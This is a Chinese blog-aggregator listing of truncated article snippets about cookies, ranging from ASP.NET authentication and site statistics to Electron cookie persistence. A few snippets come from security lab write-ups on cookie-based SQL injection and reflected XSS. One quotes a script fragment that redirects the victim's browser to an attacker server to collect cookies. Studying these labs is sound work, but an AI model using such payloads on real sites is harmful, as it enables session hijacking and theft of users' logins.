1.单引号,报错型,cookie型注入。 (1)登录后页面显示: (2)查看一下php文件 可以看到查询语句查询cookee,那我们就在cookies里面进行注入 (3)抓包看一下: 看到cookie:uname=admin ,就可以以cookie注入了 (4)加单引号发现: 爆出语法错误,看得出来 ...
分类:
其他好文 时间:
2020-02-13 20:45:32
阅读次数:
99
大家在使用ASP.NET的时候一定都用过FormsAuthentication做登录用户的身份认证,FormsAuthentication的核心就是Cookie,ASP.NET会将用户名存储在Cookie中。 现在到了ASP.NET CORE的时代,但是ASP.NET CORE中没有FormsAut ...
分类:
Web程序 时间:
2020-02-13 19:12:42
阅读次数:
86
业务场景 公司对旗下新的网站做推广,统计网站的PV(访问量),UV(独立访客),IP(独立IP) PV: 网站被访问次数,可通过刷新页面提高访问量 UV: 网站被不同用户访问的次数,可通过cookie统计访问量,相同用户切换ip地址,UV不变 IP:网站被不同IP地址访问的总次数,可通过IP地址统计 ...
分类:
Web程序 时间:
2020-02-13 18:51:59
阅读次数:
89
一、requests库 1、header主要存放cookie,token等信息,body主要存放post的数据 2、requests库使用urllib3,多次请求使用同一个socket,减少消耗 3、python的join函数:语法:'sep'.join(seq) 以sep作为分隔符,将seq所有的 ...
分类:
其他好文 时间:
2020-02-13 13:14:17
阅读次数:
59
反射型XSS(get方式):前端设置:查看页面源代码把长度20设置长一点方便输入语句: <script>alert(1)</script>,get形式的XSS会生成相应的url是比较好利用的一种漏洞。 反射型XSS(get)方式的案例演示:盗取用户cookie 本实验用的攻击服务器(收集cookie ...
分类:
其他好文 时间:
2020-02-13 00:21:50
阅读次数:
106
xss后台的安装 重定向到另一个可信网址 让点击者 不知情 1.cookie值获取 查看源代码 在反射型xss(get)页面下使用 <script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie= ...
分类:
其他好文 时间:
2020-02-12 19:02:30
阅读次数:
356
在日常开发里,一般原生cookie容易出现问题,所以这里我们介绍一个插件 1、上GitHub搜索js cookie 2、这里推荐选择下载量高的 点击进入,js-cookie 结合文档使用即可 . ...
分类:
其他好文 时间:
2020-02-12 18:29:54
阅读次数:
48
现象 背景 Electron 中 BrowserWindow 提供比较简易的浏览器界面,但是没有直接提供 cookies 持久化和恢复的操作,以至于在关闭窗口后,无法恢复cookies。 需求 实现cookies在BrowserWindow中持久化,以及重启恢复现场 关联 https://www.j ...
分类:
其他好文 时间:
2020-02-12 16:38:07
阅读次数:
63
1、什么是cookie和session? cookie是网站用来辨别用户身份,进行会话跟踪,存储在本地终端上的数据。 session(会话)起来本含义是指有始有终的一系列动作和消息。在web中,session主要用来在服务器端存储特定用户对象会话所需要的信息。 2、cookie和session产生的 ...
分类:
其他好文 时间:
2020-02-12 14:37:10
阅读次数:
56
只要浏览互联网,不可避免的,我们每天都在将自己的信息痕迹留在网上,比如Cookie,IP地址,广告偏好设置等等一系列的所有这些都可以收集和利用。随着Windows10的普及面越来越广,用户也随着增加,今天我们聊一聊如何在新的Microsoft Edge浏览器中更好的使用防跟踪设置。 新的Edge浏览 ...
分类:
其他好文 时间:
2020-02-12 01:01:38
阅读次数:
116
